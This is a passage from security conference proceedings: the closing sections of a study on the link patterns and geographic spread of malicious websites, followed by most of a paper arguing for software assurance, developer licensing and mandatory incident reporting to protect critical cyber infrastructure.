identified to be 0.59, which is more than three times the clustering coefficient of the malicious<br />
websites. This shows that the links among the malicious websites are low in number.<br />
63
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 16: Screenshot of the website medicalmarijuanablog.com<br />
6. Link visualization<br />
Links were visualized on the Google maps using the Google maps application programming interface<br />
(API). The pre-computed geographic locations of the websites using the IP address to location<br />
database were used to plot them on to the Google maps. Link visualization provides an interactive<br />
means for analyzing the patterns followed by the links among different websites. The interactive map<br />
helps in zooming and displays the name of the website on clicking the marker.<br />
In Figure 17, the malicious websites and the facilitating websites are marked with red and blue<br />
markers respectively. The red lines represent the bidirectional links, the green lines represent the<br />
incoming link with respect to the facilitating website and the blue lines represent the outgoing link with<br />
respect to the facilitating website. The lines going out from one extreme are connected through the<br />
other extreme. From the above two images it is evident that the links are traversing among the<br />
malicious domains across different countries presenting the fact that the attackers are not limiting the<br />
hosting of their malicious websites either to a hosting service or to a country.<br />
In Figure 18, the red lines represent the bi-directional links and the green lines represent the<br />
unidirectional links. In Figure 19, on selecting a domain all the links associated with malicious<br />
domains are depicted on the map. The green line represents an incoming link with respect to the<br />
selected domain, the red line represents a bidirectional link and the blue line represents the outgoing<br />
link with respect to the selected domain.<br />
7. Conclusion<br />
In this work we presented some interesting heuristics of the malicious websites that help in enhancing<br />
the mechanisms used for the detection of malicious websites.<br />
We identified the behavior of the malicious websites with respect to their indegrees and outdegrees.<br />
We defined an equation that fits to the behavior of the indegree and the outdegree of the malicious<br />
websites, which followed the power law with exponential cutoff.<br />
Compared the outdegree of the malicious websites with that of the legitimate websites and concluded<br />
that the malicious websites tend to have low outdegree compared to the legitimate websites.<br />
We computed the clustering coefficient of the malicious websites and compared to that of the<br />
legitimate websites and showed that the linking among the malicious websites is low compared to that<br />
of the legitimate websites.<br />
Our results during the analysis showed that the attackers are using legitimate websites with high<br />
Google page rank as the means for directing traffic towards the malicious websites.<br />
64
Manoj Cherukuri and Srinivas Mukkamala<br />
We presented a new way of visualizing the links on the map using their geographical locations and<br />
showed the fact that the attackers are not limiting the hosting of their malicious websites to a country<br />
or a hosting service but are spread all over.<br />
Figure 17: Visualization of malicious websites connected through the facilitating websites<br />
Figure 18: Visualization of malicious domains linked to other malicious domains<br />
65
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 19: Shows customized link visualization where domains exist in the left pane<br />
8. Future work<br />
We are planning to perform similarity analysis among different malicious websites to identify clusters<br />
of malicious sites under one control. This helps in understanding the behavior and the characteristics<br />
of the groups of attackers. We are also planning to extend this study using content analysis of the<br />
malicious webpages.<br />
Acknowledgements<br />
We would like to thank our data sources PhishTank, Malware Domain Blocklist, MalwarePatrol,<br />
Malware Domain List, joewein.de LLC. and abuse.ch.<br />
References<br />
“Beautiful Soup.” (2010), Crummy [Online], 09 Apr, Available: http://www.crummy.com/software/BeautifulSoup<br />
[01 Jun 2010].<br />
Chakrabarti, D. and Faloutsos, C. (2006) “Graph Mining: Laws, Generators and Algorithms”, ACM Computing<br />
Survey, vol. 38, no. 1.<br />
Cheng, J. (2008) "Symantec: Underground Cybercrime Economy Booming.", Ars Technica [Online], 25 Nov,<br />
Available: http://arstechnica.com/security/news/2008/11/symantec-underground-cybercrime-economybooming.ars<br />
[10 Aug 2010].<br />
“Clustering Coefficient.” (2010), Wikipedia Foundation [Online], 29 Jul, Available:<br />
http://en.wikipedia.org/wiki/Clustering_coefficient#Global_clustering_coefficient [07 Aug 2010].<br />
Cova, M., Kruegel, C., and Vigna, G. (2010) “Detection and Analysis of Drive-by Download Attacks and Malicious<br />
JavaScript Code”, WWW 2010 - 19th International World Wide Web <strong>Conference</strong>, North Carolina (USA).<br />
“December 2009 Web Server Survey.” (2009), Netcraft [Online], 24 Dec, Available:<br />
http://news.netcraft.com/archives/2009/12/24/december_2009_web_server_survey.html [10 Aug 2010].<br />
Kalafut, A.J., Shue, C.A. and Gupta, M. (2010) “Malicious Hubs: Detecting Abnormally Malicious Autonomous<br />
Systems”, IEEE Infocom Mini-<strong>Conference</strong>, California (USA).<br />
Luvender, R.V. (2010) “Fraud Trends in 2010: Top threats from a growing underground economy.”, A First Data<br />
White Paper.<br />
Ma, J., Saul, L.K., Savage, S., and Voelker, M.G. (2009) “Beyond Blacklists: Learning to Detect Malicious Web<br />
Sites from Suspicious URLs”, Knowledge Discovery and Data Mining, Paris.<br />
Provos, N. (2010) “Malware Statistics Update.”, Google Online Security Blog [Online], 25 Aug, Available:<br />
http://googleonlinesecurity.blogspot.com/2009/08/malware-statistics-update.html [10 Aug 2010].<br />
Stevens, K. (2010) “The Underground Economy of Pay-Per-Install Business”, Black Hat Technical Security<br />
<strong>Conference</strong>, Las Vegas (USA).<br />
“Top Sites.” (2010), Alexa Internet Inc. [Online], 10 Jul, Available: http://www.alexa.com/topsites [10 Jul 2010].<br />
Watts, D.J. and Strogatz, S.H. (1998), “Collective dynamics of ‘small-world’ networks”, NATURE, Vol 393, pp<br />
440-443.<br />
66
Manoj Cherukuri and Srinivas Mukkamala<br />
“World Internet Usage and Population Statistics.” (2010), www.internetworldstats.com [Online], Available:<br />
http://www.internetworldstats.com/stats.htm [10 Aug 2010].<br />
Zhuge, J., Holz, T., Song, C., Guo, J., Han, X. and Zou, W. (2007) “Studying Malicious Websites and the<br />
Underground Economy on the Chinese Web”, Workshop on Economics of Information Security,<br />
Pennsylvania (USA).<br />
67
The Strategies for Critical Cyber Infrastructure (CCI) Protection<br />
by Enhancing Software Assurance<br />
Mecealus Cronkrite, John Szydlik and Joon Park<br />
Syracuse University, USA<br />
micronkr@syr.edu<br />
jaszydli@syr.edu<br />
jspark@syr.edu<br />
Abstract: Modern organizations are becoming more reliant on complex, interdependent, integrated information<br />
systems. Key national industries are the critical infrastructure (CI) and include telecommunications, energy,<br />
healthcare, agriculture, and transportation. These CI industries are becoming more dependent on a critical cyber<br />
infrastructure (CCI) of computer information systems and networks, which are vital to the continuity of the economy.<br />
Organized attackers are increasing in number and power with more powerful computing resources that increasingly<br />
threaten CCI software systems. The motivations for attacks range from terrorism, fraud, identity theft,<br />
espionage, and political activism. Government and industry research have found that most cyber attacks exploited<br />
known vulnerabilities and common software programming errors. Software publisher vendors have been<br />
unable to agree or implement a secure coding standard for two main reasons. The on-technical consumer is ill<br />
informed to demand secure quality products. These current conditions perpetuate preventable risk. As a result,<br />
software vendors do not implement security unless specifically required by the customer, leaving many systems<br />
full of gaps. Since most of exploited vulnerabilities are preventable, the implementation of a minimum level of<br />
software quality is one of the key countermeasures for protecting the critical information infrastructure. Government<br />
and industry can improve the resilience of the CI in an increasingly interdependent network of information<br />
systems by protecting the CCI with stronger software assurance practices and policies and strengthening product<br />
liability laws and fines for non-compliance. In this paper we discuss the increasing software and market risks to<br />
CCI and address the strategies to protect the CCI through enhancing software assurance practices and policies.<br />
Keywords: critical cyber infrastructure, secure programming quality, software assurance<br />
1. Introduction<br />
The first major Internet attack in 1988 by the Morris worm was a bad prank gone awry, but made it<br />
clear, that for the first time, cyber security threats could escape physical boundaries. Cyber threats<br />
could now spread rapidly through the Internet and impact different organizations and countries simultaneously.<br />
In 2001, Code Red and Nimda were the first attacks to operate disrupt the commercial<br />
internet affecting many business and ecommerce sites. (Gelbstien & Kamal, 2002) Next, the 2003<br />
SQL Slammer worm caused major disruption of commercial and banking systems this attack used a<br />
weakness that already had a solved by patch but had not been applied to enough of the consumer<br />
base to cause damage to other companies because of internet slowdown. In 2003, the Sobig virus<br />
temporarily shut down 23,000 miles of a railway system, arguably the first successful CI attack,<br />
(McGuinn, 2004). However, the 2010 Stuxnet SCADA attack was undoubtedly the first of its kind to<br />
disrupt CI operations. Its entry point was ultimately attributable to a hard coded SQL administrative<br />
password (Falliere, et. al. 2010), a well-known bad development practice. In the twenty-two years<br />
since Morris, damage from cyber security incidents have grown in frequency and impact.<br />
Over the past ten years, especially, the numbers of successful CCI attacks have been increasing. The<br />
profile of the creators of malware programs have changed since the days of the Morris worm. Today<br />
malware is being developed and used primarily by criminal actors for financial gain and potentially by<br />
other actors seeking to cause market instability and economic damage.<br />
In the past computing attacks required access to high-end computing which was limited to wellfunded,<br />
established entities that could support large data centres and computer clusters. However,<br />
the introduction of the botnet has created a black-market for spam sending, decryption large-scale<br />
brute force cracking activities, and Distributed Denial of Service (DDoS) attacks for hire for very cheap<br />
prices scaled according to the target size. (OCED, 2008)<br />
A “botnet” is criminal network of distributed computing, created by compromising victim devices, usually<br />
through malware that exploits existing software weaknesses, and makes them a slave or “zombie”<br />
to the larger criminal computer network called a “botnet.” As the computing power of non-secured<br />
internet-connected devices increases so does the collective computing power of botnets. It is typical<br />
68
Mecealus Cronkrite et al.<br />
to see botnets with over ten thousand nodes or hosts at their command. (US-CERT, 2005) Very large<br />
botnets such as Conflicker or Mariposa controlled millions of nodes.<br />
Botnets can also do any distributed application criminals can imagine these are “Criminal Clouds” already<br />
active and operational years ahead of industry. These rouge ad-hoc botnets have greatly<br />
strengthened the computing arsenal of non-state criminal and terrorist organizations. (Council of<br />
Europe Counterterrorism Task Force, 2007) Motivated attackers now have access to cheap, large<br />
scale “stolen” computing grids. As a result, all the baseline security presumptions associated with securing<br />
or encrypting data and the securing the data’s availability over the internet has greatly weakened.<br />
2. Background<br />
2.1 The relationship between the CI and the CCI<br />
Figure 1: CCI IS stack by security control and influence<br />
The US Department of Homeland Security Presidential Directive-7 (HSPD-7) defines the critical infrastructure<br />
(CI) by the importance of an industry to society and the economy, e.g. transportation, agriculture,<br />
energy, healthcare, telecommunications, and emergency services. The critical cyber infrastructure<br />
(CCI) represents the information systems that support the operation of these key needs.<br />
DHS’ National Cyber Command Division (NCCD) is responsible for protecting the CCI in the US, and<br />
focuses on helping the CI industries, “conduct vulnerability assessments, develop training, and educate<br />
the control systems community on cyber risks and mitigation solutions.” (Mcurk Testimony, 2010)<br />
We can layer the components that intersect in a malware attack by their ability to control or influence<br />
security processes, as in Figure 1. Developer knowledge and skill are the final arbiters of quality code<br />
with the influence of the software publisher’s development methodology supervising those decisions.<br />
Therefore, the ability to control and change the behaviour of security depends on the quality practices<br />
of the software publisher and their developers. (Wang, et. al, 2008) The responsibility for security<br />
software rests with the company that publishes software code, and the developers that participated in<br />
IS system development because their knowledge of the system exceeds other spheres of influence.<br />
2.2 The increasing risk to Critical Cyber Infrastructure (CCI)<br />
Losses attributable to coding defects or weak configuration have increased in all industry sectors. The<br />
impact from cyber attacks grows as the dependence on CCI systems designed with poor practices<br />
continues. Up until the 2010, Stuxnet attack critical infrastructure systems were ‘siloed’ or separated<br />
69
Mecealus Cronkrite et al.<br />
from possible internet damage. Stuxnet thwarted this final defence and achieved an attack through a<br />
series of weaknesses in software practices. (Falliere, et. al. 2010)<br />
Malware can get into vulnerable systems without detection from anti-virus measures because it exploits<br />
trusted software. Bad programming practices result in most of the preventable malware attack.<br />
(Goertzel et. al.2007) The Software Engineering Institute estimates that 90 percent of reported security<br />
incidents result from exploits against defects in the design or code of software. (Mead, et. al,<br />
2009) The defects exploited, stemmed from a relatively small number of known programming errors<br />
such as failing to check data input before adding it to a database, hard-coding, or developing applications<br />
dependent on over privileged accounts to run. (MITRE & SANS, 2010)<br />
Malware has this additional hidden impact cost to the economy because the true costs of the “zeroday”<br />
malware effect are extremely difficult to measure since they are undetectable. When software<br />
with vulnerabilities releases on its “zero-day,” during this time attackers activities cannot be blocked or<br />
detected. The delay between the developer knowing and making a fix available to when administrators<br />
install it on all affected systems can lag for years. Even with patches available, the zero-day risk<br />
is still a threat to CI when organizations or consumers are unaware of the risk or patch. Patching is a<br />
failed program of reactive repairs.<br />
3. Software risks to the Critical Cyber Infrastructure (CCI) and proposed mitigations<br />
To assess potential damage caused by cyber threats, and find ways to strengthen the resilience and<br />
defence of the CCI. “Stuxnet demands that we look not just to the security community but also to the<br />
system designers, planners, engineers, and operators of our essential technology and physical infrastructures.”<br />
(Assante, 2010)<br />
One of the first rules of defence is deterrence, so approaches for enhancing the current level of CCI<br />
defence are going to be through fixing the preventable errors. Software assurance is a way of deterrence<br />
because it is the practice of providing high levels of software quality free of known defects.<br />
(Wang, et. al, 2008) Techniques such as coding standards can improve deterrence by making simple<br />
attacks fail and increase the resources needed for successful attacks.<br />
3.1 Mitigation: Developer non-repudiation<br />
By requiring CI software developers and publishers module code signing creates an accountability<br />
process. To implement code signing a system similar to the web domain registration system, with a<br />
‘WhoIS’ style lookup, could be combined with a Public Key Infrastructure (PKI) like the SSL registration<br />
systems. Developers can start to sign all code modules or apps to an individual developer and<br />
publisher. Major popular IDE can also support a PKI plug-in system to support code-signing development.<br />
Certificates for code signing are already a plug-in in many IDEs.<br />
Developer abstraction can be handled at a level similar to engineering, for example, if the senior developer<br />
signs the code, then they are accountable for security issues later, just like an architect or<br />
engineer is. The company management should sign the final code again so they also have tangible<br />
accountability for the software quality. Similar to the US Sarbanes-Oxley (SOX) law requires the<br />
CEO/CFO to sign off on the accuracy public financial records<br />
Customer systems could be configured to disallow anonymous code to run. By forcing all software to<br />
present credentials to run we can start to establish a trace for code that is working or failing.<br />
3.2 Mitigation: Create development tools to assist and automate security<br />
The government and major Integrated Development Environment IDE developers should collaborate<br />
to create security test suites to identify common errors automatically, even to the complier level. IDEs<br />
should check code similar to how W3C validation engines corrected for common HTML errors. This<br />
will help programmers improve without additional cost. IDE automated test tools will transition legitimate<br />
developers and publishers to comply with that new level of quality. With free tools for checking<br />
code, code compliance becomes easier at all layers of development, the success of this approach<br />
being W3C, and the rare occurrence today of unreadable HTML pages. HTML code validation is now<br />
70
Mecealus Cronkrite et al.<br />
trivial. Today most web code is generated in content management frameworks so the workload has<br />
switched from the individual developer to the tools.<br />
3.3 Mitigation: Professionally license CCI software developers and publishers<br />
Many vital economic sectors in the physical world have accredited professionals to create a culture of<br />
quality and security. Electricians, architects, and engineering professionals are certified and accredited<br />
to practice because their quality of work affects public safety and infrastructure. However, unlike<br />
other CI professions there are no legally recognized accreditation processes for IT. Anyone can develop<br />
software without liability for the behaviour of that software. IT workers design, construct, and<br />
manage applications, databases, and network systems for all types of public trust transactions. They<br />
do this all without the professional support systems.<br />
We can relate the safe and security measures used in other professions as a model for software assurance.<br />
Like these conventional professions, IT professions are also responsible for major portions<br />
of the critical infrastructure in the cyber world. “[IT] practitioners can produce results as inconvenient<br />
or dangerous as any medical or legal mishap, without their having the amount of regulation or informed<br />
public scrutiny which both those areas command.” (Wikes, 1997: 88) By leveraging the existing<br />
professional frameworks that supports other CI professions such as accounting, engineering, and<br />
medicine, we can adopt policies and technologies that support improved public safety. Existing technology<br />
systems can create accountability for the software industry and transparency for its customers.<br />
While academic training and apprenticeship still provides the basis of disseminating knowledge of<br />
good models and best practices, the professional boards and licenses should support these practices<br />
with ethics. Certification and licensing options have the potential of legitimizing IT as a profession by<br />
improving the quality of output. (Wilkes, 1997) These certifications still face implementation challenges<br />
as there are numerous standards and organization bodies in the software industry, none of<br />
them have any enforcement capability that makes adoption of any minimum standard extremely difficult.<br />
Key industry organizations such as ACM and IEEE, and others that lead the professionalism of<br />
the industry only have voluntary membership status which makes their effectiveness challenging.<br />
Any application that supports the CI should have certified developers and publishers licensed to code<br />
for the CCI systems. By differentiating, then the consumer will get security accountability built into<br />
systems. The market will begin to shift to demand the same levels of quality in other industries, which<br />
will encourage software developers to distinguish themselves in the marketplace. This would also<br />
raise the barriers to entry on the software development market and ease the pressure on existing<br />
competitors who are able to adopt assurance practices, which will benefit both the software industry<br />
and the consumer.<br />
4. Market risks preventing software quality and security and proposed mitigations<br />
The current highly competitive commercial software marketplace does not have the incentives or repercussions<br />
to implement standards. In many situations, security is always an optional add-on. A<br />
common business argument to the developer is to ‘worry about security later’. However, this would<br />
not occur if a mechanic had reported that a vehicle was unsafe. There is widespread lack of individual<br />
autonomy; IT workers feel that they cannot prioritize quality and safety ahead of production speed and<br />
‘agility’ within their organization due to business pressures. With government supported licensing, the<br />
individual practitioner will be able to gain autonomy and legitimacy for security driven efforts as a matter<br />
of compliance.<br />
The customer is at a disadvantage in market knowledge. Consumers expect that reasonable security<br />
measures but there is no such assurance. Typically, the customer has to require specifically in their<br />
contract specific security measures. If security is not explicitly in the requirements, it is a burden on<br />
the development company to implement it. All estimates for the true cost of security in the system are<br />
wrong from the first unsecured prototype that delivered to the client. The customer is left to learn<br />
about security by taking a risk acceptance posture by default. By accepting unsecure software, they<br />
incorrectly feeding the market an acceptance signal. Without security forced to be “built-in” to the<br />
process, the uninformed consumer does not know to discriminate between secure and non-secure<br />
technologies and demand them accordingly to signal more supply.<br />
71
Mecealus Cronkrite et al.<br />
The “industry knows best” approach for cyber-security is inefficient and a market failure. (Assante,<br />
2010) The public’s level demand for cyber-security is higher than most firms’ individual demand. This<br />
is because the private costs resulting from a cyber-incident are often less than the public’s cost. As an<br />
example, when electronically stored customer credit card information is stolen from a store the financial<br />
institutions are often responsible for the loss not the store that had badly configured security.<br />
4.1 Vulnerability: Cyber incident data is inconsistent<br />
Most industries have no mandatory cyber incident reporting which makes estimating the true impact<br />
of cyber crime difficult to measure. Regular studies performed by the FBI (CSI, 2009), Secret Service,<br />
Verizon (Baker et. al, 2010) and Microsoft (Microsoft SIR, 2010) all use voluntary surveys and data<br />
gathering. However, there are differences in the change in malware rates. The FBI, Microsoft and<br />
Verizon security reports agree that malware attacks are on the risk. However, according to Microsoft’s<br />
SIR report, “Software vulnerabilities…have been on the decline since the second half of 2006,” The<br />
report ascribed this progress to better development quality practices (Microsoft, SIR, 2010) This disparity<br />
is the result of two vastly different data sets that Microsoft and Verizon have used the voluntary<br />
nature of cyber incident responses contributes to these differences. However, all three reports agree<br />
that data is inconsistent due to the lack of a mandatory reporting system.<br />
4.2 Mitigation: Mandate cyber incident reporting<br />
According to a Computer Security Institute survey only a small fraction of organizations that experience<br />
a cyber attack, report it to law enforcement. (CSI, 2009) Firms generally do not favour expanded<br />
mandatory reporting because they do not want bad press, or the public to have a negative perception.<br />
The reluctance is even greater when the firm does not suffer any immediate financial loss. Reporting<br />
these intrusions (crimes) is in the greater interest of society because authorities stand a better chance<br />
of stopping them if they have more information about the threat in general and can learn from emerging<br />
patterns.<br />
To address privacy concerns a reporting system that is similar to U.S. Treasury FINCEN Suspicious<br />
Activity Report (SAR) could be used. Currently, most financial institutions are mandated to report certain<br />
types of suspicious activity using SARs. SARs are kept secret and have tight dissemination standards<br />
and an effective tool in fighting financial crime. A similar reporting system for cyber-attacks<br />
would be equally beneficial. “Disclosure laws” could force software publishers and their customers<br />
that support critical infrastructure to report cyber-attacks and data breaches to DHS. (DHS NIAC,<br />
2009). By mandating reporting, there will be a more accurate picture regarding cyber threats. (Goertzel<br />
et. al.2007) This will help researchers identify weakness, and aid in the apprehension of attackers.<br />
The data collected will help inform actuary tables for insurance firms, and to develop risk analyses.<br />
Cyber crime incident reporting should be required by all CI industries first to gain better knowledge<br />
about the threat malware poses and educate business owners and managers about the financial<br />
and legal implications of improper software assurance processes.<br />
4.3 Vulnerability: Demand for cyber security<br />
Rational firms should use IT risk management to manage cyber security, but, firms often lack the<br />
knowledge and expertise to implement and it is difficult for firms to measure the effectiveness of investments<br />
into cyber security. (Mead, et. al, 2009) This makes it hard to justify expenditures and results<br />
in the general lack of secure programming investment. The public is left with the costs of a cyber-security<br />
incident such as firms that were the target of the cyber incident as well as its clients,<br />
banks or others who feel its negative effects, and include taxpayers if the government responds.<br />
Since the overall damage of a cyber-incident is generally higher for the public, they would rationally<br />
choose to have a higher investment in cyber-security. Unfortunately, the public has little say in what<br />
investment an individual firm decides to make in cyber-security leading to underinvestment in the<br />
eyes of the public. In economic terms, the aggregate private firm’s demand for cyber security is less<br />
than the public’s demand. This is a market failure, which invites regulation or some form of market<br />
correction to rectify this externality.<br />
Figure 2 illustrates a private firm’s efficient level of investment at q1 where there firms demand for<br />
security “D” equals the marginal cost “MC” for each additional investment. . The marginal social benefit<br />
is the public’s demand which equals q* when it crosses the marginal cost line. “q*” represents the<br />
72
Mecealus Cronkrite et al.<br />
socially efficient level of cyber security which is greater than the private level The graph in Figure 2,<br />
shows the public’s demand for security is greater than individual firms.<br />
Figure 2: Demand vs. Investment in cyber security<br />
4.4 Mitigation: Create information systems cyber security insurance market<br />
Data breeches usually have no consequences or fines for the company that lost the customer data,<br />
and even fewer for the development team that wrote the software or configured the servers. A cyber<br />
security insurance market can create an economic incentive for firms to implement better security<br />
standards. To establish the market governments would have to create laws placing partial liability for<br />
cyber attacks on software publishers and operating firms if they negligent by failing to implement sufficient<br />
security standards and practices. (Baer and Parkinson, 2007:50 – 56)<br />
With better cyber incident, reporting research and insurance communities can find common risky behaviour<br />
patterns. Since private insurance companies use actuary tables and measure risk they would<br />
be able to establish scalable cyber security requirements. In exchange for coverage and premium<br />
discounts, insurance companies can require private firms to take reasonable steps to protect their<br />
systems, within a risk management system. Premiums can assign a higher risk to IT security<br />
breaches stemming from programming errors and failure to adopt best practice standards in cyber<br />
security.<br />
Market forces will generate an insurance market that accommodates different sizes of firms. A major<br />
difficulty regarding this policy implementation is to ensure premiums are not too costly for firms to afford.<br />
As a result, it may be necessary for government to cap the amount of damages that a firm may<br />
pay. The government can help establish the cyber insurance market by facilitating reinsurance<br />
through indemnifying catastrophic losses.<br />
4.5 Mitigation: Compliance in U.S Federal IT acquisition security standards (fines)<br />
Government IT acquisition and procurement decisions are unlike private corporations. In private concerns,<br />
shareholder value should ultimately control spending so the implementation of security is profit<br />
goal driven. The US Federal Government has complex goals for the public good, accountability, fairness,<br />
and transparency. However, the majority of CCI is located within the private sector so to encourage<br />
effective standards government has to rely on market forces and voluntary partnerships with<br />
industry. (Golumbic, 2008)<br />
Governments and (CI) systems increasingly dependent on commercially developed software in doing<br />
so they have transferred security risk upstream to the developers. As a result, the US government has<br />
created many of its own models for secure IT acquisition and procurement that either impact system<br />
development processes. For example, NIST Special Publication 800 series, the DOD standard<br />
DIACAP, and Federal Information Security Management Act (FISMA) all are US regulations to deal<br />
73
Mecealus Cronkrite et al.<br />
with security requirements for government information systems. Security rests with the acquisition<br />
policy and contract, vendor management controls that they defined, a non-standard approach.<br />
However, the GAO has found that the federal government overall has major deficiencies information<br />
security. Mainly due to the lack of technical acquisition expertise needed to interpret and apply security<br />
requirements to contracts and the rigor and sustaining efforts required to keep validating vendor<br />
quality. (GAO-09-661T, 2009) Therefore increasing the federal IT workforce and capabilities, DHS<br />
NCCD can start to upgrade and improve the performance of security within the US government. Security<br />
requirements should be equally valued and balanced as e-government requirements in order to<br />
improve CI defence from disasters and attacks. Moreover, adding vendor non-compliance fines in the<br />
government IT acquisition process should increase the attention paid to CI systems.<br />
5. Conclusions and future work<br />
There is a growing relationship between preventable software assurance failures and exposed critical<br />
cyber infrastructure risk. Preventable software defects remain unresolved at the peril of all software<br />
consumers and endanger the cyber infrastructure on which we all rely. The software consumer is uninformed<br />
and cannot self assure that the outsource software they order meets an acceptable standard.<br />
Making the security case clear enough to the public to understand is harder than making the<br />
case to the developer and the business manager through market forces.<br />
The growing black market economy of malware is exploiting the existing known defects in widely distributed<br />
commercial software. Targeting known common software defects is a primary vector to enter<br />
trusted networks and systems. Preventable programming errors make “zombie” slave computers accessories<br />
to organized crimes. The growing criminalisation of cyber attacks is driving the need for<br />
new controls in the previously unregulated software development culture.<br />
Without support, the business will tend to favour of profits over safety. It is the nature of profit motivation.<br />
Firms on their own will not decide to invest the socially optimal amount in cyber security because<br />
it conflicts with their own rational decision making criteria. However, by supported standards it enables<br />
the developer and publisher to mitigate preventable risk.<br />
Improving software assurance practices is one of the key countermeasures for protecting critical infrastructure.<br />
The industry needs to be motivated to encourage accountability and liability on behalf of<br />
the public good by avoiding common errors. This would also raise the barriers to entry on the software<br />
development market and ease the pressure on existing competitors who are able to adopt assurance<br />
practices, while legitimatizing IT as a new profession responsible for entrusted with the public good<br />
defending the critical cyber infrastructure.<br />
The proposed approaches examined a framework of increasing government and private controls on<br />
software quality and software assurance outcomes.<br />
Mandate Cyber Incident Reporting for CI industries to increase transparency and research ability.<br />
Enforce (Fines) for Federal IT Security development Non-Compliance to create better vendor<br />
compliance.<br />
Create better IDE tools that check for common programming errors, to help prevent the programmer<br />
from making common errors, and increase the resilience of the software infrastructure.<br />
Encourage professional licensing and non-repudiation for CCI Developers and Publishers to help<br />
to increase accountability and transparency in the publisher and developer community.<br />
The software industry will not be able to negotiate the safety standards process alone, without some<br />
government assistance. There is a need for standards based software professional accreditation to<br />
ensure the consistent application of basic security programming techniques and data privacy. However,<br />
the industry should not wait for legislation. Software publishers have the ability to seize the momentum<br />
of media awareness and establish accountability for code security within their corps.<br />
Acknowledgements<br />
This work is an extended study of our final team project of IST623 (Introduction to Information Security),<br />
taught by Prof. Joon S. Park, in the School of Information Studies at Syracuse University in<br />
Spring 2010. We would like to thank the class for valuable feedback, insight, and encouragement as<br />
we researched and developed this project during the semester.<br />
74
Mecealus Cronkrite et al.<br />
The views expressed herein are those of the authors and do not necessarily reflect the views of, and<br />
should not be attributed to, the Department of Homeland Security or any of its agencies.<br />
References<br />
Assante, M.J. 2010, November 17. Testimony of Michael J. Assante, President and Chief Executive Officer National<br />
Board of Information Security Examiners of the United States Inc. Before the Senate Committee on<br />
Homeland Security and Governmental Affairs US Senate Hearing on Securing Critical Infrastructure in the<br />
Age of Stuxnet. Washington D.C.<br />
Baer, W.S. & Parkinson, A. 2007, "Cyberinsurance in IT Security Management,” IEEE Security & Privacy, vol. 5,<br />
no. 3, pp. 50-56.<br />
Baker, W., Goudie, M., Hutton, A., Hylender, c.D., Niemantsverdriet, J., Novak, c., Ostertag, D., Porter, c.,<br />
Rosen, M., Sartin, B. & Tippett, P.,United States Secret Service 2010, July 28-last update, 2010 Data<br />
Breach Investigations Report [Homepage of Verizon], [Online]. Available:<br />
http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [2010, 10/20]<br />
Council of Europe Counterterrorism Task Force 2007, Cyberterrorism-the use of the internet for terrorist purposes.<br />
Council of Europe Publishing, Strasbourg Cedex, France<br />
CSI, “14th Annual 2009 CSI Computer Crime and Security Survey” December, 2009, Computer Security Institute<br />
Falliere, N., Murchu, L.O. & Chien, E. 2010, October-last update, w32 Stuxnet Dossier [Homepage of Symantec],<br />
[Online]. Available:<br />
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dos<br />
sier.pdf [2010, 10/20]<br />
GAO May 5, 2009, GAO-09-661T: Testimony before the Subcommittee on Government Management, Organization,<br />
and Procurement; House Committee on Oversight and Government Reform: Cyber Threats and Vulnerabilities<br />
Place Federal Systems at Risk Statement of Gregory C. Wilshusen, Director, Information Security<br />
Issues, GAO, Washington, D.C.<br />
Gelbstein, E. & Kamal, A. 2002, Information insecurity :a survival guide to the uncharted territories of cyberthreats<br />
and cyber-security, 2nd ed, United Nations ICT Task Force and the United Nations Institute for<br />
Training and Research, New York, NY.<br />
Goertzel, K.M., Winograd, T., McKinley, H.L., Oh, L., Colon, M., McGibbon, T., Fedchak, E. & Vienneau, R. 2007,<br />
July 23-last update, Software Security Assurance State-of-the-Art Report (SOAR) [Homepage of Joint endeavour<br />
by IATAC with DACS], [Online]. Available: http://iac.dtic.mil/iatac/download/security.pdf [2010,<br />
10/20].<br />
Golumbic, M.C. 2008, Fighting terror online: the convergence of security, technology, and the law, Springer Verlag,<br />
New York.<br />
McGuinn, M. 2005, October 12-last update, Prioritizing Cyber Vulnerabilities, Final Report and Recommendations<br />
by the Council. [Homepage of DHS-NIAC], [Online]. Available:<br />
http://www.dhs.gov/xlibrary/assets/niac/NIAC_CyberVulnerabilitiesPaper_Feb05.pdf [2010, 10/20] .<br />
Mead, N.R., Allen, J.H., Conklin, A.W., Drommi, A., Harrison, J., Ingalsbe, J., Rainey, J. & Shoemaker, D. 2009,<br />
April-last update, Making the Business Case for Software Assurance [Homepage of Carneige Mellon Software<br />
Engineering Institute], [Online]. Available: http://www.sei.cmu.edu/reports/09sr001.pdf [2010, 10/20].<br />
Microsoft, “Microsoft Security Intelligence Report Volume 9 (Jan 1 2010 - Jun 30 2010)2010”, [Homepage of Microsoft],<br />
[Online]. Available: http://www.microsoft.com/security/sir/default.aspx [2010, 10/20].<br />
McGurk, Sean 2010, Nov.17 Statement for the Record of Seán P. McGurk Acting Director, National Cybersecurity<br />
and Communications Integration Center Office of Cybersecurity and Communications<br />
National Protection and Programs Directorate Department of Homeland Security Before the United States Senate<br />
Homeland Security and Governmental Affairs Committee, Washington, DC November 17, 2010<br />
MITRE & SANS 2010, April 5-last update, CWE/SANS Top 25 Most Dangerous Programming Errors [Homepage<br />
of MITRE], [Online]. Available: http://cwe.mitre.org/top25/ [2010, 10/20].<br />
NIAC, National Infrastructure Advisory Council September 8, 2009, Critical Infrastructure Resilience Final Report<br />
And Recommendations, DHS, Washington, D.C.<br />
OECD, 2008. “Malicious Software (Malware) A Security Threat to the Internet Economy. OECD, Seoul, Korea.<br />
US-CERT, “Build Security In. (n.d.).Key Practices for Mitigating the Most Egregious Exploitable Software Weaknesses.<br />
Software Assurance Pocket Guide Series: Development” Volume II Version 1.3.2009, May 24-last<br />
update [Homepage of DHS-US-CERT], [Online]. Available: https://buildsecurityin.uscert.gov/swa/downloads/KeyPracticesMWV13_02AM091111.pdf<br />
[2010, 10/20].<br />
US-CERT Multi-State Information Sharing and Analysis Center and United States Computer Emergency Readiness<br />
Team (US-CERT) 2005, May 16-last update, Malware Threats and Mitigation Strategies [Homepage of<br />
DHS-US-CERT], [Online]. Available: http://www.us-cert.gov/reading_room/malware-threats-mitigation.pdf<br />
[2010, 10/20]<br />
Wang, Y., Zheng, B. & Huang, H. 2008, "Complying with Coding Standards or Retaining Programming Style: A<br />
